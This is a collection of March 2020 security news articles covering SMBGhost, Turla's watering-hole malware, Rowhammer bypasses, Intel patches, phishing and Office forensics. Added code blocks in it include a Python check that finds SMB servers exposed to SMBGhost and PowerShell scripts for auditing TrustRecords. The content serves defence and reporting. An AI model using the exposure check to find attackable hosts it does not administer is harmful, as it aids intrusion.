48K Windows Hosts Vulnerable to SMBGhost CVE-2020-0796 RCE Attacks
15.3.2020 
Bleepingcomputer  Attack

After an Internet-wide scan, researchers at cybersecurity firm Kryptos Logic discovered roughly 48,000 Windows 10 hosts vulnerable to attacks targeting the pre-auth remote code execution CVE-2020-0796 vulnerability found in Microsoft Server Message Block 3.1.1 (SMBv3).

Several vulnerability scanners designed to detect Windows devices exposed to attacks are already available on GitHub, including one created by Danish security researcher ollypwn and designed to check if SMBv3 is enabled on the device and if the compression capability that triggers the bug is enabled.

The vulnerability, dubbed SMBGhost, is known to only impact desktop and server systems running Windows 10, version 1903 and 1909, as well as Server Core installations of Windows Server, versions 1903 and 1909.

Microsoft explains that "the vulnerability exists in a new feature that was added to Windows 10 version 1903" and that "older versions of Windows do not support SMBv3.1.1 compression."

ollypwn's CVE-2020-0796 scanner in action (server without and with mitigation)
DoS proof-of-concept already demoed
Kryptos Logic also shared a demo video of a denial-of-service proof-of-concept exploit developed by researcher Marcus Hutchins (aka MalwareTech).

"The SMB bug appears trivial to identify, even without the presence of a patch to analyze," according to Kryptos Logic which means that malicious actors might soon be able to develop their own CVE-2020-0796 exploits.

While no malicious scans for Windows 10 hosts without mitigations in place have been detected yet, the fact that PoC exploits have already been developed and that the bug is so easy to analyze could lead to malicious attacks soon.

The CVE-2020-0796 pre-auth RCE vulnerability
Microsoft publicly disclosed details about the SMBGhost vulnerability only after some security vendors that are part of the Microsoft Active Protections Program, and thus get early access to vulnerability information, released information during this month's Patch Tuesday.

After the news of a wormable pre-auth RCE vulnerability affecting SMBv3 spread, Microsoft published a security advisory with info on the leaked bug and mitigation measures designed to block potential attacks.

"Microsoft is aware of a remote code execution vulnerability in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests," the advisory reads. "An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target SMB Server or SMB Client."

"To exploit the vulnerability against an SMB Server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 Server. To exploit the vulnerability against an SMB Client, an unauthenticated attacker would need to configure a malicious SMBv3 Server and convince a user to connect to it."

Microsoft shares mitigation measures for SMB servers
As a workaround until a security update is released, Microsoft's advisory recommends disabling SMBv3 compression using this PowerShell (Admin) command (no reboot required, does not prevent the exploitation of SMB clients):

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force
Additionally, enterprise customers are advised to block TCP port 445 at the enterprise perimeter firewall to prevent attacks attempting to exploit the flaw.

"This can help protect networks from attacks that originate outside the enterprise perimeter," Redmond explains. "Blocking the affected ports at the enterprise perimeter is the best defense to help avoid Internet-based attacks."

"However, systems could still be vulnerable to attacks from within their enterprise perimeter," Microsoft adds.

We've just finished our first internet wide scan for CVE-2020-0796 and have identified 48000 vulnerable hosts. We'll be loading this data into Telltale for CERTs and organisations to action. We're also working on a blog post with more details (after patch).

— Kryptos Logic (@kryptoslogic) March 12, 2020
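The scanners mentioned in this article and the mitigation check in the KB4551762 article above both come down to one question: does the server negotiate SMB 3.1.1 and advertise a compression capability? The Python below, an added example that is not ollypwn's, Kryptos Logic's or Microsoft's code, parses an SMB2 NEGOTIATE response and answers that question; field layouts follow MS-SMB2, the sample responses are constructed in build_negotiate_response(), and sending the NEGOTIATE request to TCP port 445 is assumed to be done by whatever inventory tooling you already run against your own hosts.

```python
"""Parse an SMB2 NEGOTIATE response and report whether the server advertises
SMB 3.1.1 compression, the feature behind CVE-2020-0796 (SMBGhost).

Added example; not Microsoft's, ollypwn's or Kryptos Logic's code. Layouts follow
MS-SMB2 (header 2.2.1, NEGOTIATE response 2.2.4, negotiate context 2.2.3.1).
Sample responses are constructed by build_negotiate_response().
"""
import struct
import uuid
from typing import Dict, List, Optional

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001
DIALECT_311 = 0x0311
CTX_PREAUTH_INTEGRITY = 0x0001
CTX_COMPRESSION = 0x0003          # SMB2_COMPRESSION_CAPABILITIES
ALGORITHM_NAMES = {0x0001: "LZNT1", 0x0002: "LZ77", 0x0003: "LZ77+Huffman", 0x0004: "Pattern_V1"}


def parse_negotiate_response(msg: bytes) -> Dict[str, object]:
    """Return the negotiated dialect and any compression algorithms the server offers."""
    if len(msg) < 128 or msg[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 message")
    header_size, = struct.unpack_from("<H", msg, 4)
    command, = struct.unpack_from("<H", msg, 12)
    if header_size != 64 or command != SMB2_NEGOTIATE:
        raise ValueError("not a NEGOTIATE response")
    body = 64                                        # response body follows the 64-byte header
    struct_size, _sec_mode, dialect, ctx_count = struct.unpack_from("<HHHH", msg, body)
    if struct_size != 65:
        raise ValueError("unexpected NEGOTIATE response StructureSize")
    ctx_offset, = struct.unpack_from("<I", msg, body + 60)   # offset from start of header

    algorithms: List[int] = []
    offset = ctx_offset
    # NegotiateContextCount is only meaningful for dialect 3.1.1 (reserved otherwise).
    for _ in range(ctx_count if dialect == DIALECT_311 else 0):
        ctx_type, data_len = struct.unpack_from("<HH", msg, offset)
        data = msg[offset + 8: offset + 8 + data_len]
        if ctx_type == CTX_COMPRESSION and data_len >= 8:
            count, = struct.unpack_from("<H", data, 0)          # CompressionAlgorithmCount
            algorithms = list(struct.unpack_from("<%dH" % count, data, 8))
        offset += (8 + data_len + 7) & ~7                      # contexts are 8-byte aligned
    return {"dialect": dialect,
            "compression": [ALGORITHM_NAMES.get(a, hex(a)) for a in algorithms]}


def is_smbghost_exposed(parsed: Dict[str, object]) -> bool:
    """True when the server speaks 3.1.1 and still advertises compression."""
    return parsed["dialect"] == DIALECT_311 and bool(parsed["compression"])


def build_negotiate_response(dialect: int, compression: Optional[List[int]]) -> bytes:
    """Constructed sample response, shaped like a Windows 10 1903 server's.
    compression=None models DisableCompression=1: the context is simply omitted."""
    contexts = b""
    if dialect == DIALECT_311:
        # Pre-auth integrity context is mandatory for 3.1.1: SHA-512 with a 32-byte salt.
        preauth = struct.pack("<HHH", 1, 32, 0x0001) + b"\x11" * 32
        contexts += struct.pack("<HHI", CTX_PREAUTH_INTEGRITY, len(preauth), 0) + preauth
        if compression is not None:
            contexts += b"\0" * (-len(contexts) % 8)            # align next context to 8
            comp = struct.pack("<HHI", len(compression), 0, 0)
            comp += struct.pack("<%dH" % len(compression), *compression)
            contexts += struct.pack("<HHI", CTX_COMPRESSION, len(comp), 0) + comp
    ctx_count = 0 if dialect != DIALECT_311 else (2 if compression is not None else 1)
    header = SMB2_MAGIC + struct.pack("<HHIHHIIQIIQ16s", 64, 0, 0, SMB2_NEGOTIATE, 1,
                                      SMB2_FLAGS_SERVER_TO_REDIR, 0, 0, 0, 0, 0, b"\0" * 16)
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, 1, dialect, ctx_count, uuid.uuid4().bytes,
                       0x2F, 0x800000, 0x800000, 0x800000, 0, 0, 128, 0,
                       128 if ctx_count else 0)
    return header + body + contexts


if __name__ == "__main__":
    for label, resp in (("unmitigated 1903", build_negotiate_response(DIALECT_311, [0x0001])),
                        ("DisableCompression=1", build_negotiate_response(DIALECT_311, None)),
                        ("SMB 3.0.2 host", build_negotiate_response(0x0302, None))):
        parsed = parse_negotiate_response(resp)
        print(f"{label:22s} dialect=0x{parsed['dialect']:04x} "
              f"compression={parsed['compression']} exposed={is_smbghost_exposed(parsed)}")
```

Because the check only looks at what the server advertises, it confirms the registry mitigation rather than the KB4551762 patch: a patched server that still offers compression is reported as exposed, so cross-check against installed updates before acting on the result.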


Advanced Russian Hackers Use New Malware in Watering Hole Operation
15.3.2020 
Bleepingcomputer  APT

Two previously undocumented pieces of malware, a downloader and a backdoor, were used in a watering hole operation attributed to the Russia-based threat group Turla.

To reach targets of interest, the hackers compromised at least four websites, two of them belonging to the Armenian government. This indicates that the threat actor was after government officials and politicians.

Simple, yet effective trick
The new tools are a .NET malware dropper called NetFlash and a Python-based backdoor named PyFlash. They would be delivered following a fake Adobe Flash update notification received by victims.

At least four Armenian websites were infected, by means still unknown, in this campaign, which has been running since at least the beginning of 2019.

armconsul[.]ru: The consular Section of the Embassy of Armenia in Russia
mnp.nkr[.]am: Ministry of Nature Protection and Natural Resources of the Republic of Artsakh
aiisa[.]am: The Armenian Institute of International and Security Affairs
adgf[.]am: The Armenian Deposit Guarantee Fund
After gaining access to a website, the hackers added a piece of malicious JavaScript code that loaded, from the external source ‘skategirlchina[.]com’, a script designed to fingerprint the visitor’s web browser.

Visitors landing on the compromised website for the first time would get a persistent cookie whose code is publicly available. This is used for tracking future visits to sites compromised for this operation.

Security researchers from ESET believe that Turla (a.k.a. Waterbug, WhiteBear, Venomous Bear, Snake) hackers were very selective about their targets, moving to the next stage of the attack only for a small number of visitors.

In the first stage of the attack, victims would see a fake warning for updating Adobe Flash Player, shown in an iframe. If the visitor acted on it, they would get a malicious executable that installed both a legitimate copy of Flash and a Turla malware variant, ESET says in a report today.


Starting September 2019, the first-stage payload changed from a backdoor named Skipper to the new NetFlash malware downloader, which appears to have been compiled at the end of August and early September of last year.

It is NetFlash’s job to retrieve the second-stage PyFlash backdoor from a hard-coded URL and to make it persistent on the system via a Windows scheduled task.

ESET created the image below to show how Turla used this watering hole operation to target and compromise systems deemed of interest:


The attackers used ‘py2exe’ to convert their PyFlash script into an executable that runs on Windows without the need for Python.

PyFlash was mainly used to send information about the victim host to the command and control (C2) server. Supported commands relate to the OS and the network (systeminfo, tasklist, ipconfig, getmac, arp).

The C2 can send additional commands, such as downloading files from a given link, running a Windows command, changing the delay time for launching the malware, or removing infection traces by uninstalling the backdoor.

For the last one, the backdoor confirms the instruction via a POST request to the C2 with the following string:

I'm dying :(
Tell my wife that i love her...
Watering hole attacks are a known tactic for Turla but researchers are somewhat surprised that the group used a common trick to deliver their malware. This shows that even sophisticated threat actors can choose a simple solution to achieve their goal.

However, ESET points out that the actor did make an effort to evade detection by using a different payload than Skipper, which was essentially burned from long-time use.


Google Chrome Gets 'Default to Guest' Mode for Stateless Browsing
15.3.2020 
Bleepingcomputer  Security

Google announced today that a new 'Default to Guest mode' feature is now available for Windows, Linux, and macOS power users of the Chrome web browser.

The new Google Chrome feature can be enabled using a command-line switch or an enterprise policy, and it allows users to configure the web browser to always launch into Guest Mode.

In this browsing mode, Chrome will delete all browsing activity from the computer after exiting the browser, providing its users with "a stateless browsing experience from session to session."

Google Chrome Guest mode
'Default to Guest' mode for Chrome
The Guest mode can be used to allow others to use your computer for browsing or for surfing the web on someone else's device without access to any Chrome profiles.

The difference between Guest mode and Incognito mode is that you will still be able to access all the info in your profile while using the latter.

"Pages you view in this window won’t appear in the browser history and they won’t leave other traces, like cookies, on the computer after you close all open Guest windows," Google explains. "Any files you download will be preserved, however."

While browsing the web in Guest mode, Chrome will not save any info on:

Websites you visit, including the ads and resources used on those sites
Websites you sign in to
Your employer, school, or whoever runs the network you’re using
Your internet service provider
Search engines (search engines may show search suggestions based on your location or activity in your current Incognito browsing session.)
Toggling on Chrome's Default to Guest mode
Windows users can enable the new feature by following these steps:

Exit all running instances of Chrome.
Right-click on your "Chrome" shortcut.
Choose properties.
At the end of your "Target:" line add the following: chrome.exe --guest
Once complete, use the shortcut to launch Chrome.
Windows users can also open the Command Prompt or PowerShell app (or any other Terminal program), browse to Google Chrome's folder, and launch the browser with the --guest parameter.

Launching Chrome in Guest Mode from Windows PowerShell
For macOS and Linux users, Google provides this procedure:

Quit all running instances of Chrome.
Run your favorite Terminal application.
In the terminal, find your Chrome application and append --guest as a command-line parameter and hit ENTER to launch Chrome.
To get back to your Chrome profile, users will have to exit all Chrome instances and relaunch the web browser without the --guest command-line switch — Windows users who edited the shortcut will have to change the "Target:" line to its previous contents.
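The shortcut procedure above, as an added PowerShell example (not code from Google or the article): it rewrites the Arguments of a Chrome .lnk file to add or remove --guest through the WScript.Shell COM object, so the same function also performs the revert step. The default shortcut path is an assumption.

```powershell
# Added example (not from the article): add or remove '--guest' on a Chrome shortcut.
function Set-ChromeGuestShortcut {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        # Assumed location of the shortcut; pass your own path if it differs
        [string]$ShortcutPath = "$env:USERPROFILE\Desktop\Google Chrome.lnk",
        # Remove the switch instead of adding it (restores the previous Target line)
        [switch]$Revert
    )

    # Step 1 of the procedure: Chrome should be closed before the shortcut is used again
    if (Get-Process -Name chrome -ErrorAction SilentlyContinue) {
        Write-Warning 'Chrome is still running; exit all instances before relaunching.'
    }
    if (-not (Test-Path -LiteralPath $ShortcutPath)) {
        throw "Shortcut not found: $ShortcutPath"
    }

    $shell = New-Object -ComObject WScript.Shell
    $lnk   = $shell.CreateShortcut($ShortcutPath)

    # Split the current arguments and drop any existing '--guest' so it is never duplicated
    $argList = @($lnk.Arguments -split '\s+' | Where-Object { $_ -ne '' -and $_ -ne '--guest' })
    if (-not $Revert) { $argList += '--guest' }
    $newArgs = $argList -join ' '

    if ($newArgs -eq $lnk.Arguments) {
        Write-Verbose "No change needed for $ShortcutPath"
        return
    }
    if ($PSCmdlet.ShouldProcess($ShortcutPath, "set Arguments to '$newArgs'")) {
        $lnk.Arguments = $newArgs
        $lnk.Save()
    }
}

# Usage:
#   Set-ChromeGuestShortcut -WhatIf        # preview the change
#   Set-ChromeGuestShortcut                # launch into Guest mode from now on
#   Set-ChromeGuestShortcut -Revert        # go back to the normal profile
```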


Windows Registry Helps Find Malicious Docs Behind Infections
15.3.2020 
Bleepingcomputer  Spam  Virus

If a Windows computer becomes infected and you are trying to find its source, a good place to check is for malicious Microsoft Office documents that have been allowed to run on the computer.

Ransomware, downloaders, RATs, and info-stealing Trojans are commonly distributed through phishing emails containing Word and Excel documents with malicious macros.

When a user opens one of these documents in Microsoft Office, depending on the protection of the document or if the document contains macros, Office will restrict the functionality of the document unless the user clicks on 'Enable Editing' or 'Enable Content' buttons.

When a user enables a particular feature such as editing or macros, the document will be added as a Trusted Document to the TrustRecords subkey under one of the following Registry keys, depending on whether it is a Word or Excel document:

HKEY_CURRENT_USER\Software\Microsoft\Office\[office_version]\Word\Security\Trusted Documents\TrustRecords
HKEY_CURRENT_USER\Software\Microsoft\Office\[office_version]\Excel\Security\Trusted Documents\TrustRecords
This allows Microsoft Office to remember the decision a user made and not prompt them again in the future.

This also means that if a user allowed editing or macros in a document by pressing the appropriate button, Office will remember this decision the next time you open the document and not ask again.

The good news is we can use this information to our advantage to find Word and Excel documents with macros that have been enabled on the computer.

Trusting Microsoft Office Documents
To illustrate how a document becomes a Trusted Document, let's walk through the steps of opening an actual Word document with malicious macros that were being distributed in a phishing campaign.

As the ultimate goal for a bad actor is for you to enable macros in the document, they commonly display a message walking the user through clicking on the 'Enable Content' button so that macros will be executed and malware will be installed on the computer.

In this particular example, the malicious document is protected, which means it cannot be edited until a user clicks on the 'Enable Editing' button. Furthermore, if a document is protected a user must Enable Editing before they can get to the prompt to enable macros.

Protected Malicious Word document
When a user clicks on 'Enable Editing', the full path to the document will be added as a value under the HKEY_CURRENT_USER\Software\Microsoft\Office\[office_version]\Word\Security\Trusted Documents\TrustRecords key.

This contains individual values for each document that has been trusted in some manner; either the Enable Editing or Enable Content button has been clicked.

TrustRecords Key
A created value's data will consist of a timestamp, some other information, and finish with four bytes that determine what action has been trusted. In this case, we clicked on 'Enable Editing', so the last four bytes will be set to 01 00 00 00.

Last four bytes set to 01 00 00 00
Now that the document has been enabled for editing, Word will prompt the user if they want to enable macros by clicking on the 'Enable Content' button.

Malicious document prompting to enable macros
If a user clicks on the 'Enable Content' button, Office will update the TrustRecord for the document to indicate that macros have been allowed with this document and will always be allowed going forward.

This is done by changing the last four bytes of the document's TrustRecord to FF FF FF 7F as seen below.

Macros are allowed to run in this document
The use of Trusted Documents does not only apply to Word but also other Office applications. For example, if the user clicks on Enable Editing or Enable Content in an Excel spreadsheet, a TrustRecord will be created under the HKEY_CURRENT_USER\Software\Microsoft\Office\[office_version]\Excel\Security\Trusted Documents\TrustRecords Registry key as shown below.

Excel Trust Records
Putting it all together
Now we know that every time a user clicks on 'Enable Editing' or 'Enable Content', Microsoft Office will add the path to the document as a Registry value under the program's TrustRecords key.

We also know that if the last four bytes of the trusted document's value data are set to FF FF FF 7F, it means that the user enabled macros in the document, which is a very common vector for a computer to become infected.

Using this information, we can check for potential malicious documents whose macros have been enabled by checking the values under the following keys and then collecting the documents for further forensics.

HKEY_CURRENT_USER\Software\Microsoft\Office\[office_version]\Word\Security\Trusted Documents\TrustRecords
HKEY_CURRENT_USER\Software\Microsoft\Office\[office_version]\Excel\Security\Trusted Documents\TrustRecords
This method is especially useful for tracking down Emotet, TrickBot, Ransomware, or RAT infections.

Clearing Trusted Documents
As TrustRecords remember a user's actions forever and would allow macros to run automatically in a previously enabled document, it is best to remove the Trusted Documents from the Registry at regular intervals.

This can be done through login scripts, scheduled tasks, or other methods.
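The triage described under "Putting it all together" and the scripted clearing mentioned just above, as one added PowerShell example (not code from the article): it enumerates the Word and Excel TrustRecords keys for every installed Office version, flags values whose last four bytes are FF FF FF 7F, and offers a clearing function suitable for a login script or scheduled task. Interpreting the leading eight bytes as a FILETIME and expanding environment variables in the stored path are assumptions, not something the article states.

```powershell
# Added example (not from the article): triage and clear Office TrustRecords.
$Apps = 'Word', 'Excel'

function Get-TrustRecordKey {
    $root = 'HKCU:\Software\Microsoft\Office'
    if (-not (Test-Path -LiteralPath $root)) { return }
    # The article's [office_version] is a numeric subkey such as 16.0
    foreach ($ver in Get-ChildItem -LiteralPath $root | Where-Object { $_.PSChildName -match '^\d+\.\d+$' }) {
        foreach ($app in $Apps) {
            $key = "$root\$($ver.PSChildName)\$app\Security\Trusted Documents\TrustRecords"
            if (Test-Path -LiteralPath $key) {
                [PSCustomObject]@{ App = $app; Version = $ver.PSChildName; Key = $key }
            }
        }
    }
}

function Get-TrustedOfficeDocument {
    foreach ($k in Get-TrustRecordKey) {
        $item = Get-Item -LiteralPath $k.Key
        foreach ($name in $item.GetValueNames()) {
            $data = [byte[]]$item.GetValue($name)        # REG_BINARY comes back as byte[]
            if ($data.Length -lt 4) { continue }
            # Last four bytes decide what was trusted: 01 00 00 00 = editing, FF FF FF 7F = macros
            $tailHex = ($data[-4..-1] | ForEach-Object { $_.ToString('X2') }) -join ' '
            # Assumption: the leading 8 bytes are a little-endian FILETIME of the trust decision
            $trustedAt = $null
            if ($data.Length -ge 8) {
                try { $trustedAt = [DateTime]::FromFileTime([BitConverter]::ToInt64($data, 0)) } catch { }
            }
            [PSCustomObject]@{
                App           = $k.App
                Version       = $k.Version
                # Assumption: expand any %VARIABLE% in the stored path (harmless if there is none)
                Document      = [Environment]::ExpandEnvironmentVariables($name)
                TrustedAt     = $trustedAt
                LastFourBytes = $tailHex
                MacrosEnabled = ($tailHex -eq 'FF FF FF 7F')
            }
        }
    }
}

function Clear-TrustedOfficeDocument {
    # Removes every TrustRecords value, so Office will prompt again for each document
    [CmdletBinding(SupportsShouldProcess)]
    param()
    foreach ($k in Get-TrustRecordKey) {
        $item = Get-Item -LiteralPath $k.Key
        foreach ($name in $item.GetValueNames()) {
            if ($PSCmdlet.ShouldProcess("$($k.App) $($k.Version): $name", 'remove TrustRecord')) {
                Remove-ItemProperty -LiteralPath $k.Key -Name $name
            }
        }
    }
}

# Usage:
#   Get-TrustedOfficeDocument | Where-Object MacrosEnabled |
#       Format-Table App, TrustedAt, Document -AutoSize     # documents to collect for forensics
#   Clear-TrustedOfficeDocument -WhatIf                      # preview a scheduled clean-up
```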

Users can also clear their Trusted Documents through the Microsoft Office Trust Center, which can be accessed by performing the following steps:

From within Word or Excel, click on File and then Options.
Under Trust Center, click on the Trust Center Settings button.
Opening the Trust Center
When the Trust Center opens, click on the Trusted Documents section in the left column.
In the Trusted Documents section, click the Clear button and all of the Trusted Documents will be cleared. This also means that if you open a previously trusted document, Word or Excel will prompt you to 'Enable Editing' or 'Enable Content' again.
Clear Trusted Documents
Repeat this same process in your other Office applications.
Close the Trust Center.


DDR4 Memory Still At Rowhammer Risk, New Method Bypasses Fixes
15.3.2020 
Bleepingcomputer  Attack

Academic researchers testing modern memory modules from Samsung, Micron, and Hynix discovered that current protections against Rowhammer attacks are insufficient.

Current mitigation solutions are efficient against known Rowhammer variants but attack possibilities are not exhausted and exploitation is still possible.

The new findings show that memory bit flipping works on many devices, including popular smartphones from Google, Samsung, and OnePlus.

Rowhammer risk lingers on
The attack works by taking advantage of the close proximity of memory cells available in a dynamic random access memory (DRAM).

By hammering one row with sufficient read-write operations, the value of the nearby data bits can change from one to zero and vice-versa (bit flipping). Current variants of the attack access two memory rows (called aggressors), at most.

This modification can lead to a denial-of-service condition, increased privileges on the machine, or it can even allow hijacking the system.

Rowhammer attacks have been demonstrated over time by compromising the Linux kernel, breaking cloud isolation, rooting mobile devices, taking control of web browsers, targeting server applications over the network, or extracting sensitive info stored in RAM.

The best defense to date is commonly referred to as Target Row Refresh (TRR) and it is supposed to eradicate the risk of Rowhammer attacks.

But there is little information about TRR, how it works, and how it is deployed by each vendor/manufacturer - because they need to protect proprietary technology.

Contrary to common belief, TRR is not a single mitigation mechanism, say researchers from VUSec (Systems and Network Security Group at VU Amsterdam).

It is an umbrella term that defines multiple solutions at various levels of the hardware stack and manufacturers took different routes to obtain the same result.

VUSec tested a batch of 42 DDR4 modules with TRR enabled against all known Rowhammer variants and found that no bit flipping occurred, showing that the defenses were effective against the known attacks.


VUSec found that there are multiple implementations for TRR in DRAM chips from various vendors and that vulnerable cells are not distributed in the same way for every chip.

TRRespass - the Rowfuzzer
With help from researchers at ETH Zurich, who provided SoftMC (an FPGA-based infrastructure), VUSec was able to experiment with DRAM chips and understand the internal operations.

This showed them that it is easy to flip the bits once the mitigation is understood. They also noticed that the vulnerability is worse on DDR4 chips than on DDR3 because of the difference in tolerated row activation counts, which is higher for DDR3.

They found that current TRR implementations track a limited number of aggressor rows hammered by the attacker, two being the most used in currently demonstrated attacks.

"The mitigation clearly cannot keep the information about all accessed rows at the same time, since it would require an unaffordable amount of additional memory nor can it refresh all the victims" - VUSec

So they tried using more aggressor rows. With the newly-gained insight from experimenting with SoftMC, VUSec created a fuzzing tool they named TRRespass, "to identify TRR-aware RowHammer access patterns on modern systems."

"While fuzzing is a common technique in software testing, we implemented the first fuzzer aimed at triggering Rowhammer corruptions in DRAM" - VUSec

TRRespass is open source and works by repeatedly selecting random rows at various locations in DRAM. Starting from the initial hammering patterns produced by TRRespass, the researchers developed a broader class, which they call "Many-sided Rowhammer."


In a paper describing their research and results, VUSec says that their fuzzer recovered effective access patterns for 13 of the 42 memory modules they tested with the TRR protection enabled.

They emphasized that all the modules where TRRespass induced bit flips are vulnerable to at least two hammering patterns. Also, the patterns vary from one module to another.

Running the fuzzer on the low-power DDR4 modules in 13 smartphones, it successfully found Rowhammer patterns that induced bit flips in 5 models: Google Pixel, Google Pixel 3, LG G7 ThinQ, OnePlus 7, and Samsung Galaxy S10e (G970F/DS).


Exploiting the vulnerability with the more sophisticated patterns yielded impressive results, despite not tweaking the attacks for increased efficiency.

The worst time needed to obtain kernel privileges was three hours and 15 minutes, while the best was 2.3 seconds.

They were able to forge a signature from a trusted RSA-2048 key in up to 39 minutes (on other chips this was possible in a little over a minute).

Bypassing sudo permission checks was possible with just one memory module and took around 54 minutes of hammering.


VUSec published the research paper "TRRespass: Exploiting the Many Sides of Target Row Refresh" that provides extensive details about their findings and the results achieved with TRRespass.

They disclosed the new type of Rowhammer attacks to all affected parties in November 2019, but new mitigations are not easy to implement and will take some time to deploy. The new method is now tracked as CVE-2020-10255.

A statement from Intel says that VUSec's research does not show a vulnerability in Intel CPUs and recommends contacting the memory chip supplier for appropriate mitigations.

"Enabling Error Correcting Code (ECC) and/or utilizing memory refresh rates greater than 1X can reduce susceptibility to this and other potential Rowhammer-style attacks" - Intel

Citing previous research (1, 2, 3), VUSec says that there are no reliable solutions for older hardware against Rowhammer, and that "stopgap solutions such as using ECC and doubling (or even quadrupling) the refresh rate have proven ineffective." They showed in research published last year that ECC has its limitations against this type of attack.

AMD also issued a statement, saying that their "microprocessor products include memory controllers designed to meet industry-standard DDR specifications."


Intel Patches High Severity Flaws in Windows Graphics Drivers
15.3.2020 
Bleepingcomputer  Vulnerability

Intel released security updates to address 27 vulnerabilities as part of March 2020 Patch Tuesday, with ten of them being high severity security flaws impacting Intel's Graphics Drivers for Windows and the Smart Sound Technology integrated audio DSP in Intel Core and Intel Atom CPUs.

The security issues patched today are detailed in the nine security advisories published by Intel on its Security Center, with the company providing download links for security updates available through the drivers and software download center.

The vulnerabilities disclosed today may allow authenticated or privileged users to potentially access sensitive information, to trigger denial-of-service states, and escalate privileges via local access.

Some of the advisories feature a detailed list of all affected products, recommendations for vulnerable products, as well as contact details for users and researchers who want to report other security flaws found in Intel branded software or hardware products.

Full list of March 2020 Patch Tuesday advisories
A list of all security advisories issued by Intel during this month's Patch Tuesday is available below, ordered by highest CVSS score rating to help prioritize patch deployment.

Advisory ID Title CVSS Score Range Severity rating
INTEL-SA-00354 Intel® Smart Sound Technology Advisory 8.6 HIGH
INTEL-SA-00315 Intel® Graphics Driver Advisory 3.2 – 8.4 HIGH
INTEL-SA-00352 BlueZ Advisory 7.1 HIGH
INTEL-SA-00343 Intel® NUC™ Firmware Advisory 7.7 - 7.8 HIGH
INTEL-SA-00349 Intel® MAX® 10 FPGA Advisory 6.1 MEDIUM
INTEL-SA-00319 Intel® FPGA Programmable Acceleration Card N3000 Advisory 4.4 – 6 MEDIUM
INTEL-SA-00330 Snoop Assisted L1D Sampling Advisory 5.6 MEDIUM
INTEL-SA-00334 Intel® Processors Load Value Injection Advisory 5.6 MEDIUM
INTEL-SA-00326 Intel® Optane™ DC Persistent Memory Module Management Software Advisory 4.4 MEDIUM
New Spectre-type data injection vulnerability
As part of this month's Patch Tuesday, Intel also addressed a vulnerability (CVE-2020-0551), disclosed by researchers yesterday, that enables a novel class of attack techniques against modern Intel processors: attackers can inject malicious data into apps via transient-execution attacks and steal sensitive data.

According to the researchers who discovered and reported the new vulnerability, dubbed LVI (short for Load Value Injection), it bypasses all the mitigations developed so far for Intel's processors against transient-execution attacks such as Meltdown, Spectre, Foreshadow, ZombieLoad, RIDL, and Fallout.

"Load value injection in some Intel processors utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side-channel with local access," Intel's security advisory explains.

LVI impacts Intel Skylake Core-family processors and newer; a list of all affected CPUs is provided by Intel here.

Icelake Core-family processors aren't affected by LVI, the researchers say, while Meltdown-resistant processors are "only potentially vulnerable to LVI-zero-data (aka loads exhibiting zero injection behavior only)."

A video showcasing two LVI (Load Value Injection) proof of concept demo attacks against vulnerable Intel platforms is embedded below.

"Due to the numerous complex requirements that must be satisfied to successfully carry out the LVI method, Intel does not believe LVI is a practical exploit in real-world environments where the OS and VMM are trusted," Intel Director of Communications Jerry Bryant said.

"New mitigation guidance and tools for LVI are available now. These work in conjunction with previously released mitigations to substantively reduce the overall attack surface associated with speculative execution side channels."

Intel released updates to the SGX Platform Software (PSW) and SDK to mitigate potential exploits of Load Value Injection (LVI) on platforms and apps using Intel SGX, with impacted system users having to install the latest Intel SGX PSW 2.7.100.2 or above for Windows and 2.9.100.2 or above for Linux.

An academic research paper with more technical information on LVI attacks is available here in PDF format and Intel's white paper can be found here.


Nasty Phishing Scam Pretends to Be Your HIV Test Results
14.3.2020 
Bleepingcomputer 

A new phishing scam is pretending to be your HIV test results to make you more likely to open up a malicious Excel document and become infected.

Over the past year, phishing campaigns have been getting nastier and nastier with scammers coming up with wild stories to get you to open a malicious document or click a link.

In what could be a new low, Proofpoint researchers have found scammers sending phishing emails with malicious Excel spreadsheets that pretend to be your HIV test results from Vanderbilt University.

Fake HIV Test Results
While the scammers slip up and misspell the name as 'Vanderbit University', unless you pay close attention you can easily miss the spelling mistake.

Attached to these emails is a file named TestResults.xlsb that, when opened, states that your data is protected and that you need to click 'Enable Content' to view the document.

Malicious Excel Spreadsheet
Once you enable content, though, malicious macros execute that download and install the Koadic penetration testing and post-exploitation toolkit.

Using Koadic, the attackers gain complete control over the infected computer and can execute any command they wish, such as downloading further malware or stealing files.

"In recent years it has been used by a variety of nation state actors, including both Chinese and Russian state-sponsored groups, as well as attackers associated with Iran," Proofpoint explained in their report.

It is important to remember that medical institutions will never send medical results via ordinary email and will instead have you log in to a secure portal to view results.

"This latest campaign serves as a reminder that health-related lures didn’t start and won’t stop with the recent Coronavirus-themed lures we observed. They are a constant tactic as attackers recognize the utility of the health-related “scare factor.” We encourage users to treat health-related emails with caution, especially those that claim to have sensitive health-related information. Sensitive health-related information is typically safely transmitted using secured messaging portals, over the phone, or in-person," Proofpoint reiterated.

It is also important never to open unexpected attachments from strangers or organizations. Even if the sender is familiar, it is better to confirm by phone or in person that they sent the email than to open a potentially malicious document.


Microsoft March 2020 Patch Tuesday Fixes 115 Vulnerabilities
14.3.2020 
Bleepingcomputer  OS

Today is Microsoft's March 2020 Patch Tuesday, which is always stressful for your Windows administrators, so be especially nice to them today.

With the release of the March 2020 security updates, Microsoft has released fixes for 115 vulnerabilities in Microsoft products. Of these vulnerabilities, 24 are classified as Critical, 88 as Important, and 3 as Moderate.

Users should install these security updates as soon as possible to protect Windows from known security risks.

For information about the non-security Windows updates, you can read about today's Windows 10 KB4540673 & KB4538461 cumulative updates.

The curious case of the missing CVE-2020-0796 vulnerability
Earlier today, BleepingComputer was told that Microsoft was releasing a fix for a wormable SMBv3 RCE vulnerability (CVE-2020-0796), but Microsoft never released it.

Not much information was available, but the vulnerability was very severe and felt like another EternalBlue type of vulnerability.

While Microsoft never shared any info, sites for security companies such as Fortinet and Cisco Talos did originally publish information about the vulnerability. Cisco Talos has since removed it.

